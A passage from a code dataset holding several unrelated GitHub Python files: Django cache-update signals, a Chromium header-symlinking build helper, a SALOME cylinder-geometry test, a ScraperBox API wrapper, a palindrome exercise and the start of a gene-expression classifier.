finally:\n anim.stop()\n return ret\n return wrapper\n return decorator\n\n\n\n\n","repo_name":"nitanmarcel/Trash-Anim","sub_path":"trash_anim/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42309429199","text":"from django.dispatch import receiver\nfrom django.db.models.signals import post_save, post_delete, m2m_changed\n\nfrom bgsite.models import Person, Memorial, MemorialGraveplot, GravePlot\nfrom geometries.models import TopoPolygons, Layer, FeatureAttributes\nfrom geometriespublic.models import PublicAttribute\nfrom mapmanagement.views import getClusterLayer\n\n@receiver(m2m_changed, sender=Memorial.images.through)\ndef update_memorial_image(instance, action, **kwargs):\n \"\"\"Clears the cache when a post_add or post_remove signal is recieved from the model\"\"\"\n\n if action == 'post_add' or action == 'post_remove':\n \"\"\"Updates the layer cache when a memorial has been added or removed\"\"\"\n instance.update_layer_cache(False)\n\n@receiver([post_save, post_delete], sender=MemorialGraveplot)\ndef update_MemorialGraveplot(instance, **kwargs):\n\n \"\"\"Updates the layer cache when a link has been made or removed\"\"\"\n instance.memorial.update_layer_cache(False)\n\n@receiver([post_save], sender=TopoPolygons)\ndef update_TopoPolygon(instance, **kwargs):\n \"\"\"\n Updates the layer cache if this is a memorial or graveplot.\n Other feature types are updated in geometries app.\n \"\"\"\n\n try:\n memorial = instance.memorial\n except:\n memorial = False\n \n try:\n graveplot = instance.graveplot\n except:\n graveplot = False\n\n created = kwargs.get('created', False)\n\n if not created:\n # If created, this is dealt with in update_GravePlotOrMemorial.\n # Note: created does seem to work. Hence try except below.\n if memorial:\n try:\n obj = Memorial.objects.get(topopolygon__id=instance.id)\n obj.update_layer_cache(created)\n except:\n pass\n\n elif graveplot:\n try:\n obj = GravePlot.objects.get(topopolygon__id=instance.id)\n obj.update_layer_cache(created)\n except:\n pass\n \n if memorial or graveplot:\n query_set = Memorial.objects.filter(topopolygon__geometry__isnull=False).prefetch_related('topopolygon')\n \n # update the cluster layer if its based on memorials and a memorial has changed\n # or it's based on a graveplot and a graveplot has changed\n if (query_set.exists() and memorial) or ((not query_set.exists()) and graveplot):\n getClusterLayer()\n\n@receiver([post_delete], sender=TopoPolygons)\ndef delete_TopoPolygon(instance, **kwargs):\n \"\"\"\n Updates the layer cache if this is a memorial or graveplot.\n Other feature types are updated in geometries app.\n \"\"\"\n\n try:\n memorial = instance.memorial\n except:\n memorial = False\n \n try:\n graveplot = instance.graveplot\n except:\n graveplot = False\n\n if memorial:\n layer_obj = instance.layer\n layer_obj.update_feature_in_layer_geojson_cache(memorial.uuid, None, False, deleted=True)\n\n elif graveplot:\n # this graveplot has been deleted\n layer_obj = instance.layer\n\n # exception for available plot\n if layer_obj.feature_code.feature_type == 'available_plot':\n layer_obj.update_feature_in_layer_geojson_cache(instance.id, None, True, deleted=True)\n else:\n layer_obj.update_feature_in_layer_geojson_cache(graveplot.uuid, None, False, deleted=True)\n\n \n if memorial or graveplot:\n query_set = Memorial.objects.filter(topopolygon__geometry__isnull=False).prefetch_related('topopolygon')\n \n # update the cluster layer if its based on memorials and a memorial has changed\n # or it's based on a graveplot and a graveplot has changed\n if (query_set.exists() and memorial) or ((not query_set.exists()) and graveplot):\n getClusterLayer()\n\n@receiver([post_save], sender=Memorial)\n@receiver([post_save], sender=GravePlot)\ndef update_GravePlotOrMemorial(instance, created, **kwargs):\n \"\"\"\n If feature has just been created\n \"\"\"\n if created and instance.topopolygon:\n if instance.topopolygon.layer.feature_code.feature_type == 'available_plot':\n # remove current cache if it exists\n instance.topopolygon.layer.update_feature_in_layer_geojson_cache(instance.topopolygon.id, None, False, deleted=True)\n\n instance.update_layer_cache(created)\n\n@receiver(m2m_changed, sender=TopoPolygons.feature_attributes.through)\ndef update_MaterialFeatureAttributes(instance, action, **kwargs):\n \"\"\"Clears the cache when a post_add or post_remove signal is recieved from the model\"\"\"\n\n if action == 'post_add' or action == 'post_remove':\n material_attribute = PublicAttribute.objects.get(name='Material')\n\n pk_set = kwargs.get('pk_set', False)\n pk = pk_set.pop()\n\n feature_attribute = FeatureAttributes.objects.get(pk=pk)\n \n # if it's the material attribute being modified\n if feature_attribute.attribute == material_attribute:\n\n try:\n memorial = instance.memorial\n except:\n memorial = False\n \n if memorial:\n memorial.update_layer_cache(False)\n\n@receiver([post_save], sender=FeatureAttributes)\ndef update_MaterialFeatureAttributes2(instance, **kwargs):\n\n created = kwargs.get('created', False)\n\n # if attribute has just been created, cache update will happen in update_MaterialFeatureAttributes\n if not created:\n material_attribute = PublicAttribute.objects.get(name='Material')\n \n # if it's the material attribute being modified\n if instance.attribute == material_attribute:\n\n try:\n memorial = instance.topopolygons_set.all()\n memorial = memorial[0].memorial\n except:\n memorial = False\n \n if memorial:\n memorial.update_layer_cache(False)","repo_name":"muhammadabdulhaseeb075/BGMS-Frontend","sub_path":"BGMS/bgsite/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":5929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25538500392","text":"#!/usr/bin/env python3\n\nfrom cache_vars import build_dir, vars, verbose\n\nfrom glob import glob\nimport os\nfrom os import listdir, readlink, set_blocking, symlink\nfrom os.path import basename, dirname, exists, getmtime, isdir, isfile, islink, join, pathsep, relpath, splitext\nfrom subprocess import DEVNULL, Popen, PIPE, run, TimeoutExpired\nfrom sys import executable, stderr\n\nimport json\n\ninc_link = join(build_dir,'component','inc_link')\nchromium_src = vars['CHROMIUM_SOURCE_TREE'].rstrip('/')\nprofile = vars['CHROMIUM_PROFILE']\nsource_bases = [\n chromium_src,\n join(chromium_src,'out',profile,'gen'),\n join(chromium_src,'v8','include'),\n join(chromium_src,'third_party', 'abseil-cpp')\n ]\nfor inc_dir in glob(f'{chromium_src}/third_party/**/include', recursive=True):\n if isdir(inc_dir):\n source_bases.append(inc_dir)\n\ndef makedirs(p):\n if not isdir(p):\n os.makedirs(p)\n\n# if not exists(join(inc_link,'google','protobuf')):\n# makedirs(join(inc_link,'google'))\n# symlink(join(chromium_src,'third_party','protobuf','src','google','protobuf'), join(inc_link,'google','protobuf'))\nif not exists(join(inc_link,'absl')):\n symlink(join(chromium_src,'third_party','abseil-cpp','absl'),join(inc_link,'absl'))\n\ndef quoted(inc):\n inc = inc[inc.index('\"')+1:]\n return inc[0:inc.index('\"')]\ndef angled(inc):\n inc = inc[inc.index('<')+1:]\n return inc[0:inc.index('>')]\n\nlink_count = 0\nunfound_count = 0\n\nclass Command:\n def __init__(self,c,d):\n self.command = c\n self.command[self.command.index('-c')] = '-E'\n i = self.command.index('-o')\n del self.command[i:i+2]\n verbose('Command is now',self.command)\n self.directory = d\n self.start()\n\n def __str__(self):\n return ' '.join(self.command)\n\n def start(self):\n self.retry = False\n self.dead = False\n self.task = Popen( self.command, cwd=self.directory, stdout=DEVNULL, stderr=PIPE, text=True )\n # self.task = Popen( self.command, cwd=self.directory, stdout=DEVNULL, stderr=PIPE, bufsize=1, text=True )\n self.left_over = ''\n set_blocking(self.task.stderr.fileno(), False)\n\n def finished(self) -> bool:\n if self.task.poll() is None:\n return False\n for line in self.task.stderr.readlines():\n self.eval_line(line)\n if self.retry:\n verbose('Retrying',self.command)\n self.start()\n return False\n return True\n\n def eval_line(self, line) -> bool:\n global link_count\n global unfound_count\n pound = line.find('#include')\n if pound == -1:\n return False\n verbose('Output line',line,self.command)\n line = line[pound:]\n quote = line.find('\"')\n angle = line.find('<')\n if angle == -1:\n inc = quoted(line)\n elif quote == -1:\n inc = angled(line)\n elif quote < angle:\n inc = quoted(line)\n else:\n inc = angled(line)\n target = join(inc_link,inc)\n if exists(target):\n print('Message',line,'mentioned',inc,'but it already exists as',target,file=stderr)\n return False\n if not exists( dirname(target) ):\n makedirs(dirname(target))\n for base in source_bases:\n source = join(base,inc)\n if exists(source):\n symlink(source, target)\n print(\"Symlink\",inc,source,'=>',target)\n self.retry = True\n link_count += 1\n return True\n print('Failed to resolve:',inc,pound,quote,angle,line,file=stderr)\n unfound_count += 1\n return False\n\npreempt = False\ndef search() -> bool:\n global link_count\n global unfound_count\n global preempt\n link_count = 0\n unfound_count = 0\n compile_commands = json.load(open(join(build_dir,'compile_commands.json')))\n commands = []\n for command_obj in compile_commands:\n artifact = command_obj['output']\n if not 'out_of_tree' in artifact:\n continue\n # evaluate_command(command_obj['command'].split(' '), command_obj['directory'])\n commands.append(Command(command_obj['command'].split(' '), command_obj['directory']))\n prev_len = 0\n existing = None\n existing_dir_map = None\n while len(commands):\n if len(commands) != prev_len:\n prev_len = len(commands)\n verbose('Remaining',list(map(str,commands)))\n try:\n doneso = next(filter(lambda x: x.finished(), commands))\n verbose('Finished, removing:',doneso)\n commands.remove(doneso)\n except StopIteration:\n if preempt:\n pass\n elif existing is None:\n existing = glob(inc_link+'/**/*.h',recursive=True)\n verbose('existing=',existing)\n elif existing_dir_map is None:\n existing_dir_map = set()\n for f in existing:\n if islink(f):\n t = readlink(f)\n existing_dir_map.add( (dirname(f), dirname(t)) )\n verbose('existing_dir_map=',existing_dir_map)\n elif len(existing_dir_map):\n t, f = existing_dir_map.pop()\n for entry in listdir(f):\n source = join(f,entry)\n target = join(t,entry)\n if exists(target):\n continue\n verbose('Consider source',source)\n if isfile(source) and splitext(entry)[-1] == '.h':\n symlink(source, target)\n print(\"Premptively symlink\",entry,source,'=>',target)\n preempt = True\n break\n else:\n existing = None\n existing_dir_map = None\n print('Linked',link_count,'new headers. Trouble with',unfound_count,'others.',file=stderr)\n return link_count > unfound_count\n\ndef flesh_out() -> bool:\n existing = glob(inc_link+'/**/*.h',recursive=True)\n existing_dir_map = set()\n for f in existing:\n if islink(f):\n t = readlink(f)\n existing_dir_map.add( (dirname(f), dirname(t)) )\n for t, f in existing_dir_map:\n for entry in listdir(f):\n source = join(f,entry)\n target = join(t,entry)\n if exists(target):\n continue\n if isfile(source) and splitext(entry)[-1] == '.h':\n symlink(source, target)\n print(\"Premptively symlink\",entry,source,'=>',target)\n return True\n return False\n\n\nif search():\n search()\nelif not preempt:\n flesh_out()\n","repo_name":"little-bear-labs/ipfs-chromium","sub_path":"cmake/inc_link.py","file_name":"inc_link.py","file_ext":"py","file_size_in_byte":6758,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"40"} +{"seq_id":"40218855286","text":"from GeomAPI import *\nfrom SketchAPI import *\n\nfrom salome.shaper import model\n\nimport math\n\nTOLERANCE = 1.e-7\n\ndef assertCylinder(theCylinder, theLocation, theAxis, theRadius, theHeight):\n assert(theCylinder is not None)\n assert(theCylinder.isInfinite() == False)\n aLoc = theCylinder.location()\n aDir = theCylinder.axis()\n assert(aLoc.distance(theLocation) < TOLERANCE), \"({}, {}, {}) != expected ({}, {}, {})\".format(aLoc.x(), aLoc.y(), aLoc.z(), theLocation.x(), theLocation.y(), theLocation.z())\n assert(aDir.isParallel(theAxis, TOLERANCE)), \"dir({}, {}, {}) is not parallel to dir({}, {}, {})\".format(aDir.x(), aDir.y(), aDir.z(), theAxis.x(), theAxis.y(), theAxis.z())\n assert(math.fabs(theCylinder.radius() - theRadius) < TOLERANCE), \"Radius {} != {}\".format(theCylinder.radius(), theRadius)\n assert(math.fabs(theCylinder.height() - theHeight) < TOLERANCE), \"Height {} != {}\".format(theCylinder.height(), theHeight)\n\ndef checkCylinderFace(theDocument, theFaceName, theLocation, theAxis, theRadius, theHeight):\n aFace = model.addFace(theDocument, [model.selection(\"FACE\", theFaceName)])\n aShape = aFace.result().resultSubShapePair()[0].shape()\n assert(aShape.isFace())\n assertCylinder(aShape.face().getCylinder(), theLocation, theAxis, theRadius, theHeight)\n theDocument.removeFeature(aFace.feature())\n\ndef checkCylinderShell(theDocument, theFaceNames, theLocation, theAxis, theRadius, theHeight):\n aSelection = []\n for name in theFaceNames:\n aSelection.append(model.selection(\"FACE\", name))\n aShell = model.addShell(theDocument, aSelection)\n aShape = aShell.result().resultSubShapePair()[0].shape()\n assert(aShape.isShell())\n assertCylinder(aShape.shell().getCylinder(), theLocation, theAxis, theRadius, theHeight)\n theDocument.removeFeature(aShell.feature())\n\ndef checkCylinderSolid(theDocument, theFaceNames, theLocation, theAxis, theRadius, theHeight):\n aSelection = []\n for name in theFaceNames:\n aSelection.append(model.selection(\"FACE\", name))\n aSolid = model.addSolid(theDocument, aSelection)\n aShape = aSolid.result().resultSubShapePair()[0].shape()\n assert(aShape.isSolid())\n assertCylinder(aShape.solid().getCylinder(), theLocation, theAxis, theRadius, theHeight)\n theDocument.removeFeature(aSolid.feature())\n\ndef checkCylinderAll(theDocument, theFeature, theFaceName, theLocation, theAxis, theRadius, theHeight):\n aShape = theFeature.result().resultSubShapePair()[0].shape()\n assert(aShape.isSolid())\n assertCylinder(aShape.solid().getCylinder(), theLocation, theAxis, theRadius, theHeight)\n\n checkCylinderShell(theDocument, [theFaceName], theLocation, theAxis, theRadius, theHeight)\n checkCylinderFace(theDocument, theFaceName, theLocation, theAxis, theRadius, theHeight)\n\ndef checkNonCylinder(theFeature):\n aShape = theFeature.result().resultSubShapePair()[0].shape()\n assert(aShape.isSolid())\n assert(aShape.solid().getCylinder() is None)\n\ndef checkNonCylindricalShell(theFeature):\n aShape = theFeature.result().resultSubShapePair()[0].shape()\n assert(aShape.isShell())\n assert(aShape.shell().getCylinder() is None)\n\n\nmodel.begin()\npartSet = model.moduleDocument()\nPart_1 = model.addPart(partSet)\nPart_1_doc = Part_1.document()\nParamH = model.addParameter(Part_1_doc, \"H\", \"10\")\nParamR = model.addParameter(Part_1_doc, \"R\", \"10\")\nParamAngle = model.addParameter(Part_1_doc, \"Angle\", \"30\")\nCylinder_1 = model.addCylinder(Part_1_doc, model.selection(\"VERTEX\", \"PartSet/Origin\"), model.selection(\"EDGE\", \"PartSet/OZ\"), \"2*R\", \"H\")\nSketch_1 = model.addSketch(Part_1_doc, model.selection(\"FACE\", \"Cylinder_1_1/Face_2\"))\nSketchProjection_1 = Sketch_1.addProjection(model.selection(\"VERTEX\", \"[Cylinder_1_1/Face_1][Cylinder_1_1/Face_2]__cc\"), False)\nSketchPoint_1 = SketchProjection_1.createdFeature()\nSketchCircle_1 = Sketch_1.addCircle(0, 0, 10)\nSketchConstraintCoincidence_1 = Sketch_1.setCoincident(SketchPoint_1.result(), SketchCircle_1.center())\nSketchConstraintRadius_1 = Sketch_1.setRadius(SketchCircle_1.results()[1], \"R\")\nmodel.do()\nExtrusion_1 = model.addExtrusion(Part_1_doc, [model.selection(\"FACE\", \"Sketch_1/Face-SketchCircle_1_2f\")], model.selection(), \"H\", 0)\nSketch_2 = model.addSketch(Part_1_doc, model.standardPlane(\"XOZ\"))\nSketchLine_1 = Sketch_2.addLine(5, 20, 0, 20)\nSketchLine_2 = Sketch_2.addLine(0, 20, 0, 30)\nSketchLine_3 = Sketch_2.addLine(0, 30, 5, 30)\nSketchLine_4 = Sketch_2.addLine(5, 30, 5, 20)\nSketchConstraintCoincidence_2 = Sketch_2.setCoincident(SketchLine_4.endPoint(), SketchLine_1.startPoint())\nSketchConstraintCoincidence_3 = Sketch_2.setCoincident(SketchLine_1.endPoint(), SketchLine_2.startPoint())\nSketchConstraintCoincidence_4 = Sketch_2.setCoincident(SketchLine_2.endPoint(), SketchLine_3.startPoint())\nSketchConstraintCoincidence_5 = Sketch_2.setCoincident(SketchLine_3.endPoint(), SketchLine_4.startPoint())\nSketchConstraintHorizontal_1 = Sketch_2.setHorizontal(SketchLine_1.result())\nSketchConstraintVertical_1 = Sketch_2.setVertical(SketchLine_2.result())\nSketchConstraintHorizontal_2 = Sketch_2.setHorizontal(SketchLine_3.result())\nSketchConstraintVertical_2 = Sketch_2.setVertical(SketchLine_4.result())\nSketchConstraintLength_1 = Sketch_2.setLength(SketchLine_1.result(), \"R/2\")\nSketchConstraintLength_2 = Sketch_2.setLength(SketchLine_2.result(), \"H\")\nSketchIntersectionPoint_1 = Sketch_2.addIntersectionPoint(model.selection(\"EDGE\", \"[Extrusion_1_1/Generated_Face&Sketch_1/SketchCircle_1_2][Extrusion_1_1/To_Face]\"), False)\n[SketchPoint_2, SketchPoint_3] = SketchIntersectionPoint_1.intersectionPoints()\nSketchConstraintCoincidence_6 = Sketch_2.setCoincident(SketchAPI_Point(SketchPoint_2).coordinates(), SketchLine_1.result())\nSketchProjection_2 = Sketch_2.addProjection(model.selection(\"EDGE\", \"PartSet/OZ\"), False)\nSketchLine_5 = SketchProjection_2.createdFeature()\nSketchConstraintCoincidence_7 = Sketch_2.setCoincident(SketchLine_2.endPoint(), SketchLine_5.result())\nmodel.do()\nRevolution_1 = model.addRevolution(Part_1_doc, [model.selection(\"FACE\", \"Sketch_2/Face-SketchLine_4r-SketchLine_3r-SketchLine_2r-SketchLine_1r\")], model.selection(\"EDGE\", \"PartSet/OZ\"), 270, 0)\nmodel.do()\n\n# Test 1. Check cylinders\naLoc1 = GeomAPI.GeomAPI_Pnt(0, 0, 0)\naLoc2 = GeomAPI.GeomAPI_Pnt(0, 0, 2 * ParamH.value())\naLoc3 = GeomAPI.GeomAPI_Pnt(0, 0, 3 * ParamH.value())\nanAxis = GeomAPI.GeomAPI_Dir(0, 0, 1)\ncheckCylinderAll(Part_1_doc, Cylinder_1, \"Cylinder_1_1/Face_1\", aLoc1, anAxis, 2 * ParamR.value(), ParamH.value())\ncheckCylinderAll(Part_1_doc, Extrusion_1, \"Extrusion_1_1/Generated_Face&Sketch_1/SketchCircle_1_2\", aLoc2, anAxis, ParamR.value(), ParamH.value())\ncheckNonCylinder(Revolution_1)\ncheckCylinderShell(Part_1_doc, [\"Revolution_1_1/Generated_Face&Sketch_2/SketchLine_4\"], aLoc3, anAxis, 0.5 * ParamR.value(), ParamH.value())\ncheckCylinderFace(Part_1_doc, \"Revolution_1_1/Generated_Face&Sketch_2/SketchLine_4\", aLoc3, anAxis, 0.5 * ParamR.value(), ParamH.value())\n\n# Test 2. Rotate cylinders\nRotation_1 = model.addRotation(Part_1_doc, [model.selection(\"SOLID\", \"Cylinder_1_1\")], model.selection(\"EDGE\", \"PartSet/OX\"), \"Angle\")\nRotation_2 = model.addRotation(Part_1_doc, [model.selection(\"SOLID\", \"Extrusion_1_1\")], model.selection(\"EDGE\", \"PartSet/OX\"), \"Angle\")\nRotation_3 = model.addRotation(Part_1_doc, [model.selection(\"SOLID\", \"Revolution_1_1\")], model.selection(\"EDGE\", \"PartSet/OX\"), \"Angle\")\n\nanAngle = ParamAngle.value() * math.pi / 180.0\naCosAngle = math.cos(anAngle)\naSinAngle = math.sin(anAngle)\nanAxis = GeomAPI.GeomAPI_Dir(0, anAxis.y() * aCosAngle - anAxis.z() * aSinAngle, anAxis.y() * aSinAngle + anAxis.z() * aCosAngle)\naLoc1 = GeomAPI.GeomAPI_Pnt(0, aLoc1.y() * aCosAngle - aLoc1.z() * aSinAngle, aLoc1.y() * aSinAngle + aLoc1.z() * aCosAngle)\naLoc2 = GeomAPI.GeomAPI_Pnt(0, aLoc2.y() * aCosAngle - aLoc2.z() * aSinAngle, aLoc2.y() * aSinAngle + aLoc2.z() * aCosAngle)\naLoc3 = GeomAPI.GeomAPI_Pnt(0, aLoc3.y() * aCosAngle - aLoc3.z() * aSinAngle, aLoc3.y() * aSinAngle + aLoc3.z() * aCosAngle)\ncheckCylinderAll(Part_1_doc, Rotation_1, \"Rotation_1_1/MF:Rotated&Cylinder_1_1/Face_1\", aLoc1, anAxis, 2 * ParamR.value(), ParamH.value())\ncheckCylinderAll(Part_1_doc, Rotation_2, \"Rotation_2_1/MF:Rotated&Sketch_1/SketchCircle_1_2\", aLoc2, anAxis, ParamR.value(), ParamH.value())\ncheckNonCylinder(Rotation_3)\ncheckCylinderShell(Part_1_doc, [\"Rotation_3_1/MF:Rotated&Sketch_2/SketchLine_4\"], aLoc3, anAxis, 0.5 * ParamR.value(), ParamH.value())\ncheckCylinderFace(Part_1_doc, \"Rotation_3_1/MF:Rotated&Sketch_2/SketchLine_4\", aLoc3, anAxis, 0.5 * ParamR.value(), ParamH.value())\n\n# Test 3. Split cylinder and compose a shell\nPlane_4 = model.addPlane(Part_1_doc, model.selection(\"FACE\", \"PartSet/XOY\"), \"2.2*H\", False)\nPlane_5 = model.addPlane(Part_1_doc, model.selection(\"FACE\", \"PartSet/XOZ\"), \"H\", False)\nPartition_1_objects = [model.selection(\"SOLID\", \"Rotation_3_1\"), model.selection(\"FACE\", \"Plane_1\"), model.selection(\"FACE\", \"Plane_2\")]\nPartition_1 = model.addPartition(Part_1_doc, Partition_1_objects)\n\nShell_1_objects = [\"Partition_1_1_1/Modified_Face&Sketch_2/SketchLine_4\",\n \"Partition_1_1_4/Modified_Face&Sketch_2/SketchLine_4\",\n \"(Partition_1_1_2/Modified_Face&Revolution_1_1/To_Face)(Partition_1_1_2/Modified_Face&Sketch_2/SketchLine_1)\"]\ncheckCylinderShell(Part_1_doc, Shell_1_objects, aLoc3, anAxis, 0.5 * ParamR.value(), ParamH.value())\n\n# Test 4. Split cylinder and compose a solid\nPartition_2 = model.addPartition(Part_1_doc, [model.selection(\"SOLID\", \"Rotation_1_1\"), model.selection(\"FACE\", \"PartSet/XOZ\")])\nSolid_1_objects = [\"(Partition_2_1_1/Modified_Face&Cylinder_1_1/Face_3)(Partition_2_1_1/Modified_Face&PartSet/XOZ/XOZ)(Partition_2_1_1/Modified_Face&Cylinder_1_1/Face_2)\",\n \"Partition_2_1_1/Modified_Face&Cylinder_1_1/Face_1&weak_name_2\",\n \"Partition_2_1_1/Modified_Face&Cylinder_1_1/Face_2\",\n \"Partition_2_1_1/Modified_Face&Cylinder_1_1/Face_3\",\n \"Partition_2_1_2/Modified_Face&Cylinder_1_1/Face_1\",\n \"Partition_2_1_2/Modified_Face&Cylinder_1_1/Face_2\",\n \"Partition_2_1_2/Modified_Face&Cylinder_1_1/Face_3\"]\ncheckCylinderSolid(Part_1_doc, Solid_1_objects, aLoc1, anAxis, 2 * ParamR.value(), ParamH.value())\n\n# Test 5. Check non-cylinder\nSketch_3 = model.addSketch(Part_1_doc, model.defaultPlane(\"XOY\"))\nSketchCircle_2 = Sketch_3.addCircle(12.62721775445329, 9.188425784259302, 5)\nSketchCircle_3 = Sketch_3.addCircle(16.49821418064359, 12.35313535520289, 5)\nSketchConstraintRadius_2 = Sketch_3.setRadius(SketchCircle_2.results()[1], 5)\nSketchConstraintEqual_1 = Sketch_3.setEqual(SketchCircle_2.results()[1], SketchCircle_3.results()[1])\nSketchConstraintDistance_1 = Sketch_3.setDistance(SketchCircle_2.center(), SketchCircle_3.center(), 5, True)\nmodel.do()\nExtrusion_2 = model.addExtrusion(Part_1_doc, [model.selection(\"COMPOUND\", \"Sketch_3\")], model.selection(), 10, 0)\nSolid_1_objects = [model.selection(\"FACE\", \"Extrusion_2_1_1/From_Face\"), model.selection(\"FACE\", \"Extrusion_2_1_1/To_Face\"), model.selection(\"FACE\", \"Extrusion_2_1_2/From_Face\"), model.selection(\"FACE\", \"Extrusion_2_1_2/Generated_Face&Sketch_3/SketchCircle_3_2&weak_name_2\"), model.selection(\"FACE\", \"Extrusion_2_1_2/Generated_Face&Sketch_3/SketchCircle_3_2&weak_name_1\"), model.selection(\"FACE\", \"Extrusion_2_1_2/To_Face\"), model.selection(\"FACE\", \"Extrusion_2_1_3/From_Face\"), model.selection(\"FACE\", \"Extrusion_2_1_3/Generated_Face&Sketch_3/SketchCircle_2_2\"), model.selection(\"FACE\", \"Extrusion_2_1_3/To_Face\")]\nSolid_1 = model.addSolid(Part_1_doc, Solid_1_objects)\ncheckNonCylinder(Solid_1)\n\n# Test 6. Check non-cylindrical shell\nShell_1_objects = [model.selection(\"FACE\", \"(Partition_2_1_1/Modified_Face&Cylinder_1_1/Face_3)(Partition_2_1_1/Modified_Face&PartSet/XOZ/XOZ)(Partition_2_1_1/Modified_Face&Cylinder_1_1/Face_2)\"),\n model.selection(\"FACE\", \"Partition_2_1_1/Modified_Face&Cylinder_1_1/Face_1&weak_name_2\"),\n model.selection(\"FACE\", \"Partition_2_1_1/Modified_Face&Cylinder_1_1/Face_2\"),\n model.selection(\"FACE\", \"Partition_2_1_1/Modified_Face&Cylinder_1_1/Face_3\"),\n model.selection(\"FACE\", \"Partition_2_1_2/Modified_Face&Cylinder_1_1/Face_1\"),\n model.selection(\"FACE\", \"Partition_2_1_2/Modified_Face&Cylinder_1_1/Face_2\"),\n model.selection(\"FACE\", \"Partition_2_1_2/Modified_Face&Cylinder_1_1/Face_3\")]\nShell_1 = model.addShell(Part_1_doc, Shell_1_objects)\ncheckNonCylindricalShell(Shell_1)\n\nShell_2 = model.addShell(Part_1_doc, [model.selection(\"FACE\", \"Extrusion_2_1_3/Generated_Face&Sketch_3/SketchCircle_2_2\"), model.selection(\"FACE\", \"Extrusion_2_1_2/Generated_Face&Sketch_3/SketchCircle_3_2&weak_name_1\")])\ncheckNonCylindricalShell(Shell_2)\n\nmodel.end()\n","repo_name":"x3-apptech/salome-modules-shaper","sub_path":"src/GeomAPI/Test/TestCylinder.py","file_name":"TestCylinder.py","file_ext":"py","file_size_in_byte":12840,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"38462559732","text":"from typing import Optional\n\nimport requests\n\nfrom proxyscraperservicewrapper.services.abstractservice import AbstractService\n\n\nclass ScraperBoxService(AbstractService):\n __api_base_url = \"https://api.scraperbox.com/scrape\"\n __query_template = \"{}?token={}&url={}&javascript_enabled={}\"\n __credit_usage_template = \"{}?token={}&url=0\"\n\n @classmethod\n def fetch_html(cls, token: str, url: str, js_rendering: Optional[bool] = False) -> str:\n try:\n if js_rendering is True:\n query = cls.__query_template.format(cls.__api_base_url, token, url, \"true\")\n else:\n query = cls.__query_template.format(cls.__api_base_url, token, url, \"false\")\n\n page = requests.get(query)\n html = page.text\n return html\n\n except Exception as e:\n raise e\n\n @classmethod\n def fetch_credit_usage_info(cls, token: str):\n try:\n url = cls.__credit_usage_template.format(cls.__api_base_url, token)\n res = requests.get(url)\n headers = res.headers\n\n return headers['X-Credits-Remaining']\n\n except Exception as e:\n raise e\n","repo_name":"AlexQ0807/proxyscraperservicewrapper","sub_path":"proxyscraperservicewrapper/services/scraperboxservice.py","file_name":"scraperboxservice.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9919402760","text":"\"\"\"calculate whether or not a string is a palindrome using recursion\"\"\"\r\n\"\"\"Brandon Pickup\"\"\"\r\n\"\"\"3 May 2014\"\"\"\r\n\"\"\"Assignment 8 Question 1\"\"\"\r\nsent = input(\"Enter a string:\\n\")\r\ndef palindrome(s):\r\n if len(s)<=1:\r\n return \"Palindrome!\"\r\n elif s[0] == s[-1]:#checks to see whether the first and last letters are the same\r\n return palindrome(s[1:len(s)-1])#runs the function again on a string with either edge truncated\r\n else:\r\n return \"Not a palindrome!\"\r\nprint(palindrome(sent))\r\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_8/pckbra002/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42903542535","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler\nfrom imblearn.over_sampling import RandomOverSampler\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.ensemble import RandomForestClassifier\npd.options.display.width = 0\n\nfeat_imp_scores, species, feat_names = [], [], []\nscores = []\n\nfor cls_task in ['Low-medium-High', 'Low-High']:\n mapped_read_counts = ['arabidopsis_counts.csv', 'zea_counts.csv', 'solanum_counts.csv', 'sbicolor_counts.csv']\n generic_feats = ['Arabidopsis_generated_features.csv', 'Zea_generated_features.csv',\n 'Solanum_generated_features.csv', 'Sorghum_generated_features.csv']\n\n for idx in range(4):\n tpm = pd.read_csv(f'tpm_counts/{mapped_read_counts[idx]}')\n predictors = pd.read_csv(generic_feats[idx], index_col=0)\n targets = []\n for log_count in tpm['logMaxTPM']:\n if log_count <= np.percentile(tpm['logMaxTPM'], 25):\n targets.append(0)\n elif log_count >= np.percentile(tpm['logMaxTPM'], 75):\n targets.append(1)\n else:\n targets.append(2)\n tpm['label'] = targets\n tpm = tpm[['gene_id', 'label']]\n data = predictors.merge(tpm, how='inner', on='gene_id')\n if cls_task == 'Low-High':\n data = data[data['label'] != 2]\n print(data.head())\n\n for chrom in data['Chromosome'].unique():\n data_train = data.copy()\n data_train = data_train[data_train['Chromosome'] != chrom]\n data_train.drop(columns=['gene_id', 'Chromosome'], inplace=True)\n data_test = data.copy()\n data_test = data_test[data_test['Chromosome'] == chrom]\n data_test.drop(columns=['gene_id', 'Chromosome'], inplace=True)\n\n # Balance data and standardizing\n sampler = RandomOverSampler(random_state=42)\n x_train, y_train = data_train.values[:, :-1], data_train['label'].values\n x_train, y_train = sampler.fit_resample(x_train, y_train)\n x_test, y_test = data_test.values[:, :-1], data_test['label'].values\n scaler = StandardScaler()\n scaler.fit(x_train)\n x_train_std = scaler.transform(x_train)\n x_test_std = scaler.transform(x_test)\n random_forest = RandomForestClassifier(100)\n random_forest.fit(x_train_std, y_train)\n if cls_task == 'Low-High':\n feat_imp = random_forest.feature_importances_\n feat_imp_scores.extend(feat_imp)\n feat_names.extend(data_train.columns[:-1])\n species.extend([generic_feats[idx].split('_')[0]] * len(data_train.columns[:-1]))\n y_pred = random_forest.predict(x_test_std)\n acc = accuracy_score(y_test, y_pred)\n scores.append([generic_feats[idx].split('_')[0], acc, cls_task])\n print(generic_feats[idx].split('_')[0], random_forest.score(x_test_std, y_test), 